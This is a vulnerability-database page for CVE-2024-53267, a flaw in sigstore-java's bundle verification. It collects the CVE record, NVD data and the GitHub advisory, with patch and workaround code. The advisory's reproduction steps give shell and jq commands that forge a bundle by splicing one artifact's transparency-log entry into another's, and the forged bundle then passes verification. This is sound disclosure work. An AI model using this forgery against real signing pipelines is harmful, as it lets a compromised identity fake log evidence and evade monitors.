Vulnerability-Lookup

CVE-2024-53267 (GCVE-0-2024-53267)

Vulnerability from cvelistv5 – Published: 2024-11-26 18:41 – Updated: 2024-11-26 19:46

Title

Vulnerability with bundle verification in sigstore-java

Summary

sigstore-java is a sigstore java client for interacting with sigstore infrastructure. sigstore-java has insufficient verification for a situation where a validly-signed but "mismatched" bundle is presented as proof of inclusion into a transparency log. This bug impacts clients using any variation of KeylessVerifier.verify(). The verifier may accept a bundle with an unrelated log entry, cryptographically verifying everything but fails to ensure the log entry applies to the artifact in question, thereby "verifying" a bundle without any proof the signing event was logged. This allows the creation of a bundle without fulcio certificate and private key combined with an unrelated but time-correct log entry to fake logging of a signing event. A malicious actor using a compromised identity may want to do this to prevent discovery via rekor's log monitors. The signer's identity will still be available to the verifier. The signature on the bundle must still be on the correct artifact for the verifier to pass. sigstore-gradle-plugin and sigstore-maven-plugin are not affected by this as they only provide signing functionality. This issue has been patched in v1.1.0 release with PR #856. All users are advised to upgrade. There are no known workarounds for this vulnerability.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

CWE

CWE-347 - Improper Verification of Cryptographic Signature

Assigner

GitHub_M

References

URL

Tags

	https://github.com/sigstore/sigstore-java/securit…	x_refsource_CONFIRM
	https://github.com/sigstore/sigstore-conformance/…	x_refsource_MISC
	https://github.com/sigstore/sigstore-java/pull/856	x_refsource_MISC

Impacted products

	Vendor	Product	Version
	sigstore	sigstore-java	Affected: >= 1.0.0, < 1.1.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "affected": [
          {
            "cpes": [
              "cpe:2.3:a:sigstore:sigstore-java:*:*:*:*:*:*:*:*"
            ],
            "defaultStatus": "unknown",
            "product": "sigstore-java",
            "vendor": "sigstore",
            "versions": [
              {
                "lessThan": "1.1.0",
                "status": "affected",
                "version": "1.0.0",
                "versionType": "custom"
              }
            ]
          }
        ],
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-53267",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-26T19:21:47.363473Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-26T19:46:41.263Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "sigstore-java",
          "vendor": "sigstore",
          "versions": [
            {
              "status": "affected",
              "version": "\u003e= 1.0.0, \u003c 1.1.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "sigstore-java is a sigstore java client for interacting with sigstore infrastructure. sigstore-java has insufficient verification for a situation where a validly-signed but \"mismatched\" bundle is presented as proof of inclusion into a transparency log. This bug impacts clients using any variation of KeylessVerifier.verify(). The verifier may accept a bundle with an unrelated log entry, cryptographically verifying everything but fails to ensure the log entry applies to the artifact in question, thereby \"verifying\" a bundle without any proof the signing event was logged. This allows the creation of a bundle without fulcio certificate and private key combined with an unrelated but time-correct log entry to fake logging of a signing event. A malicious actor using a compromised identity may want to do this to prevent discovery via rekor\u0027s log monitors. The signer\u0027s identity will still be available to the verifier. The signature on the bundle must still be on the correct artifact for the verifier to pass. sigstore-gradle-plugin and sigstore-maven-plugin are not affected by this as they only provide signing functionality. This issue has been patched in v1.1.0 release with PR #856. All users are advised to upgrade. There are no known workarounds for this vulnerability."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "LOCAL",
            "availabilityImpact": "NONE",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-347",
              "description": "CWE-347: Improper Verification of Cryptographic Signature",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-11-26T18:41:29.240Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/sigstore/sigstore-java/security/advisories/GHSA-q4xm-6fjc-5f6w",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/sigstore/sigstore-java/security/advisories/GHSA-q4xm-6fjc-5f6w"
        },
        {
          "name": "https://github.com/sigstore/sigstore-conformance/pull/166",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/sigstore/sigstore-conformance/pull/166"
        },
        {
          "name": "https://github.com/sigstore/sigstore-java/pull/856",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/sigstore/sigstore-java/pull/856"
        }
      ],
      "source": {
        "advisory": "GHSA-q4xm-6fjc-5f6w",
        "discovery": "UNKNOWN"
      },
      "title": "Vulnerability with bundle verification in sigstore-java"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-53267",
    "datePublished": "2024-11-26T18:41:29.240Z",
    "dateReserved": "2024-11-19T20:08:14.481Z",
    "dateUpdated": "2024-11-26T19:46:41.263Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-53267\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-11-26T19:21:47.363473Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:sigstore:sigstore-java:*:*:*:*:*:*:*:*\"], \"vendor\": \"sigstore\", \"product\": \"sigstore-java\", \"versions\": [{\"status\": \"affected\", \"version\": \"1.0.0\", \"lessThan\": \"1.1.0\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-11-26T19:44:41.319Z\"}}], \"cna\": {\"title\": \"Vulnerability with bundle verification in sigstore-java\", \"source\": {\"advisory\": \"GHSA-q4xm-6fjc-5f6w\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 5.5, \"attackVector\": \"LOCAL\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"NONE\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"sigstore\", \"product\": \"sigstore-java\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003e= 1.0.0, \u003c 1.1.0\"}]}], \"references\": [{\"url\": \"https://github.com/sigstore/sigstore-java/security/advisories/GHSA-q4xm-6fjc-5f6w\", \"name\": \"https://github.com/sigstore/sigstore-java/security/advisories/GHSA-q4xm-6fjc-5f6w\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/sigstore/sigstore-conformance/pull/166\", \"name\": \"https://github.com/sigstore/sigstore-conformance/pull/166\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/sigstore/sigstore-java/pull/856\", \"name\": \"https://github.com/sigstore/sigstore-java/pull/856\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"sigstore-java is a sigstore java client for interacting with sigstore infrastructure. sigstore-java has insufficient verification for a situation where a validly-signed but \\\"mismatched\\\" bundle is presented as proof of inclusion into a transparency log. This bug impacts clients using any variation of KeylessVerifier.verify(). The verifier may accept a bundle with an unrelated log entry, cryptographically verifying everything but fails to ensure the log entry applies to the artifact in question, thereby \\\"verifying\\\" a bundle without any proof the signing event was logged. This allows the creation of a bundle without fulcio certificate and private key combined with an unrelated but time-correct log entry to fake logging of a signing event. A malicious actor using a compromised identity may want to do this to prevent discovery via rekor\u0027s log monitors. The signer\u0027s identity will still be available to the verifier. The signature on the bundle must still be on the correct artifact for the verifier to pass. sigstore-gradle-plugin and sigstore-maven-plugin are not affected by this as they only provide signing functionality. This issue has been patched in v1.1.0 release with PR #856. All users are advised to upgrade. There are no known workarounds for this vulnerability.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-347\", \"description\": \"CWE-347: Improper Verification of Cryptographic Signature\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-11-26T18:41:29.240Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2024-53267\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-11-26T19:46:41.263Z\", \"dateReserved\": \"2024-11-19T20:08:14.481Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-11-26T18:41:29.240Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

FKIE_CVE-2024-53267

Vulnerability from fkie_nvd - Published: 2024-11-26 19:15 - Updated: 2024-11-26 19:15

Severity ?

5.5 (Medium) - CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/sigstore/sigstore-conformance/pull/166
	security-advisories@github.com	https://github.com/sigstore/sigstore-java/pull/856
	security-advisories@github.com	https://github.com/sigstore/sigstore-java/security/advisories/GHSA-q4xm-6fjc-5f6w

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "sigstore-java is a sigstore java client for interacting with sigstore infrastructure. sigstore-java has insufficient verification for a situation where a validly-signed but \"mismatched\" bundle is presented as proof of inclusion into a transparency log. This bug impacts clients using any variation of KeylessVerifier.verify(). The verifier may accept a bundle with an unrelated log entry, cryptographically verifying everything but fails to ensure the log entry applies to the artifact in question, thereby \"verifying\" a bundle without any proof the signing event was logged. This allows the creation of a bundle without fulcio certificate and private key combined with an unrelated but time-correct log entry to fake logging of a signing event. A malicious actor using a compromised identity may want to do this to prevent discovery via rekor\u0027s log monitors. The signer\u0027s identity will still be available to the verifier. The signature on the bundle must still be on the correct artifact for the verifier to pass. sigstore-gradle-plugin and sigstore-maven-plugin are not affected by this as they only provide signing functionality. This issue has been patched in v1.1.0 release with PR #856. All users are advised to upgrade. There are no known workarounds for this vulnerability."
    },
    {
      "lang": "es",
      "value": "sigstore-java es un cliente java de sigstore para interactuar con la infraestructura de sigstore. sigstore-java no tiene suficiente verificaci\u00f3n para una situaci\u00f3n en la que un paquete firmado v\u00e1lidamente pero \"no coincidente\" se presenta como prueba de inclusi\u00f3n en un registro de transparencia. Este error afecta a los clientes que usan cualquier variaci\u00f3n de KeylessVerifier.verify(). El verificador puede aceptar un paquete con una entrada de registro no relacionada, verificando criptogr\u00e1ficamente todo, pero no puede garantizar que la entrada de registro se aplique al artefacto en cuesti\u00f3n, por lo que \"verifica\" un paquete sin ninguna prueba de que se haya registrado el evento de firma. Esto permite la creaci\u00f3n de un paquete sin certificado fulcio y clave privada combinados con una entrada de registro no relacionada pero correcta en el tiempo para simular el registro de un evento de firma. Un actor malintencionado que use una identidad comprometida puede querer hacer esto para evitar el descubrimiento a trav\u00e9s de los monitores de registro de rekor. La identidad del firmante seguir\u00e1 estando disponible para el verificador. La firma en el paquete debe seguir estando en el artefacto correcto para que el verificador la apruebe. Sigstore-gradle-plugin y sigstore-maven-plugin no se ven afectados por esto, ya que solo brindan funcionalidad de firma. Este problema se ha corregido en la versi\u00f3n v1.1.0 con PR #856. Se recomienda a todos los usuarios que actualicen. No existen workarounds conocidas para esta vulnerabilidad."
    }
  ],
  "id": "CVE-2024-53267",
  "lastModified": "2024-11-26T19:15:30.473",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "LOCAL",
          "availabilityImpact": "NONE",
          "baseScore": 5.5,
          "baseSeverity": "MEDIUM",
          "confidentialityImpact": "NONE",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "UNCHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
          "version": "3.1"
        },
        "exploitabilityScore": 1.8,
        "impactScore": 3.6,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2024-11-26T19:15:30.473",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/sigstore/sigstore-conformance/pull/166"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/sigstore/sigstore-java/pull/856"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/sigstore/sigstore-java/security/advisories/GHSA-q4xm-6fjc-5f6w"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-347"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Secondary"
    }
  ]
}

GHSA-Q4XM-6FJC-5F6W

Vulnerability from github – Published: 2024-11-26 16:38 – Updated: 2024-12-09 17:00

Summary

sigstore-java has vulnerability with bundle verification

Details

Summary

sigstore-java has insufficient verification for a situation where a validly-signed but "mismatched" bundle is presented as proof of inclusion into a transparency log

Impact

This bug impacts clients using any variation of KeylessVerifier.verify()

The verifier may accept a bundle with an unrelated log entry, cryptographically verifying everything but fails to ensure the log entry applies to the artifact in question, thereby "verifying" a bundle without any proof the signing event was logged.

This allows the creation of a bundle without fulcio certificate and private key combined with an unrelated but time-correct log entry to fake logging of a signing event. A malicious actor using a compromised identity may want to do this to prevent discovery via rekor's log monitors.

The signer's identity will still be available to the verifier. The signature on the bundle must still be on the correct artifact for the verifier to pass.

sigstore-gradle-plugin and sigstore-maven-plugin are not affected by this as they only provide signing functionality.

Steps To Reproduce

Build the java sigstore-cli at v1.0.0

git clone --branch v1.0.0 git@github.com:sigstore/sigstore-java
cd sigstore-java
./gradlew :sigstore-cli:build
tar -xf sigstore-cli/build/distributions/sigstore-cli-1.0.0-SNAPSHOT.tar --strip-components 1

Create two random blobs

dd bs=1 count=50 </dev/urandom > blob1
dd bs=1 count=50 </dev/urandom > blob2

Sign each blob using the cli

./bin/sigstore-cli sign --bundle=blob1.sigstore.json blob1
./bin/sigstore-cli sign --bundle=blob2.sigstore.json blob2

Create a falsified bundle including the base64Signature and cert fields from blob1's bundle and the rekorBundle from blob2's bundle

jq --slurpfile bundle2 blob2.sigstore.json '.verificationMaterial.tlogEntries = $bundle2[0].verificationMaterial.tlogEntries' blob1.sigstore.json > invalidBundle.sigstore.json

Find the embedded artifact hash in the bundle, and compare to the sha256 sums of blob1 and blob2. See that the bundle tlog entry matches blob2.

cat invalidBundle.sigstore.json | jq -r '.verificationMaterial.tlogEntries[0].canonicalizedBody' | base64 -d | jq -r '.spec.data.hash.value'

sha256sum blob1 blob2

Verify the bundle against blob1

./bin/sigstore-cli verify --bundle=invalidBundle.sigstore.json blob1
# no errors???!

Patches

Patched in v1.1.0 release with https://github.com/sigstore/sigstore-java/pull/856 Added conformance test for all clients in: https://github.com/sigstore/sigstore-conformance/pull/166

Workarounds

Verifiers can recreate the log entry and compare it to the provided log entry.

var bundle = Bundle.from(bundleFile, StandardCharsets.UTF_8);
var rekorEntry = bundle.getEntries().get(0);
var calculatedHashedRekord =
    Base64.toBase64String(
        HashedRekordRequest.newHashedRekordRequest(
                artifactDigest,
                Certificates.toPemBytes(Certificates.getLeaf(bundle.getCertPath())),
                bundle.getMessageSignature().get().getSignature())
            .toJsonPayload()
            .getBytes(StandardCharsets.UTF_8));
if (!Objects.equals(calculatedHashedRekord, rekorEntry.getBody())) {
  throw new Exception("Provided verification materials are inconsistent with log entry");
}

Verifiers can contact the log and discover if the artifact signing event has indeed been added to the log

var bundle = Bundle.from(bundleFile, StandardCharsets.UTF);
var artifactDigest = Files.asByteSource(Path.of(artifact).toFile()).hash(Hashing.sha256()).asBytes();
var sigstoreTufClientBuilder = SigstoreTufClient.builder().usePublicGoodInstance();
var trustedRootProvider = TrustedRootProvider.from(sigstoreTufClientBuilder);
var entry = RekorEntryFetcher.fromTrustedRoot(trustedRootProvider).getEntryFromRekor(artifactDigest, Certificates.getLeaf(bundle.getCertPath()), bundle.getMessageSignature().get().getSignature());
RekorVerifier.newRekorVerifier(trustedRootProvider.get()).verifyEntry(entry);

Severity ?

5.5 (Medium)


                  
                    CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N

5.4 (Medium)


                  
                    CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Maven",
        "name": "dev.sigstore:sigstore-java"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.0.0"
            },
            {
              "fixed": "1.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "1.0.0"
      ]
    }
  ],
  "aliases": [
    "CVE-2024-53267"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-345",
      "CWE-347"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-26T16:38:18Z",
    "nvd_published_at": "2024-11-26T19:15:30Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nsigstore-java has insufficient verification for a situation where a validly-signed but \"mismatched\" bundle is presented as proof of inclusion into a transparency log\n\n### Impact\n\nThis bug impacts clients using any variation of KeylessVerifier.verify()\n\nThe verifier may accept a bundle with an unrelated log entry, cryptographically verifying everything but fails to ensure the log entry applies to the artifact in question, thereby \"verifying\" a bundle without any proof the signing event was logged.\n\nThis allows the creation of a bundle without fulcio certificate and private key combined with an unrelated but time-correct log entry to fake logging of a signing event. A malicious actor using a compromised identity may want to do this to prevent discovery via rekor\u0027s log monitors.\n\nThe signer\u0027s identity will still be available to the verifier. The signature on the bundle must still be on the correct artifact for the verifier to pass.\n\nsigstore-gradle-plugin and sigstore-maven-plugin are not affected by this as they only provide signing functionality.\n\n### Steps To Reproduce\n\nBuild the java sigstore-cli at v1.0.0\n```shell\ngit clone --branch v1.0.0 git@github.com:sigstore/sigstore-java\ncd sigstore-java\n./gradlew :sigstore-cli:build\ntar -xf sigstore-cli/build/distributions/sigstore-cli-1.0.0-SNAPSHOT.tar --strip-components 1\n```\n\nCreate two random blobs\n```shell\ndd bs=1 count=50 \u003c/dev/urandom \u003e blob1\ndd bs=1 count=50 \u003c/dev/urandom \u003e blob2\n```\n\nSign each blob using the cli\n```shell\n./bin/sigstore-cli sign --bundle=blob1.sigstore.json blob1\n./bin/sigstore-cli sign --bundle=blob2.sigstore.json blob2\n```\n\nCreate a falsified bundle including the base64Signature and cert fields from blob1\u0027s bundle and the rekorBundle from blob2\u0027s bundle\n```shell\njq --slurpfile bundle2 blob2.sigstore.json \u0027.verificationMaterial.tlogEntries = $bundle2[0].verificationMaterial.tlogEntries\u0027 blob1.sigstore.json \u003e invalidBundle.sigstore.json\n```\n\nFind the embedded artifact hash in the bundle, and compare to the sha256 sums of blob1 and blob2. See that the bundle tlog entry matches blob2.\n```shell\ncat invalidBundle.sigstore.json | jq -r \u0027.verificationMaterial.tlogEntries[0].canonicalizedBody\u0027 | base64 -d | jq -r \u0027.spec.data.hash.value\u0027\n\nsha256sum blob1 blob2\n```\n\nVerify the bundle against blob1\n```shell\n./bin/sigstore-cli verify --bundle=invalidBundle.sigstore.json blob1\n# no errors???!\n```\n\n### Patches\nPatched in v1.1.0 release with https://github.com/sigstore/sigstore-java/pull/856\nAdded conformance test for all clients in: https://github.com/sigstore/sigstore-conformance/pull/166\n\n### Workarounds\n1. Verifiers can recreate the log entry and compare it to the provided log entry.\n```\nvar bundle = Bundle.from(bundleFile, StandardCharsets.UTF_8);\nvar rekorEntry = bundle.getEntries().get(0);\nvar calculatedHashedRekord =\n    Base64.toBase64String(\n        HashedRekordRequest.newHashedRekordRequest(\n                artifactDigest,\n                Certificates.toPemBytes(Certificates.getLeaf(bundle.getCertPath())),\n                bundle.getMessageSignature().get().getSignature())\n            .toJsonPayload()\n            .getBytes(StandardCharsets.UTF_8));\nif (!Objects.equals(calculatedHashedRekord, rekorEntry.getBody())) {\n  throw new Exception(\"Provided verification materials are inconsistent with log entry\");\n}\n```\n2. Verifiers can contact the log and discover if the artifact signing event has indeed been added to the log\n```java\nvar bundle = Bundle.from(bundleFile, StandardCharsets.UTF);\nvar artifactDigest = Files.asByteSource(Path.of(artifact).toFile()).hash(Hashing.sha256()).asBytes();\nvar sigstoreTufClientBuilder = SigstoreTufClient.builder().usePublicGoodInstance();\nvar trustedRootProvider = TrustedRootProvider.from(sigstoreTufClientBuilder);\nvar entry = RekorEntryFetcher.fromTrustedRoot(trustedRootProvider).getEntryFromRekor(artifactDigest, Certificates.getLeaf(bundle.getCertPath()), bundle.getMessageSignature().get().getSignature());\nRekorVerifier.newRekorVerifier(trustedRootProvider.get()).verifyEntry(entry);\n```\n",
  "id": "GHSA-q4xm-6fjc-5f6w",
  "modified": "2024-12-09T17:00:45Z",
  "published": "2024-11-26T16:38:18Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sigstore/sigstore-java/security/advisories/GHSA-q4xm-6fjc-5f6w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-53267"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sigstore/sigstore-conformance/pull/166"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sigstore/sigstore-java/pull/856"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sigstore/sigstore-java"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "sigstore-java has vulnerability with bundle verification"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2024-53267 (GCVE-0-2024-53267)

FKIE_CVE-2024-53267

GHSA-Q4XM-6FJC-5F6W

Summary

Impact

Steps To Reproduce

Patches

Workarounds

Tags

Sightings

Nomenclature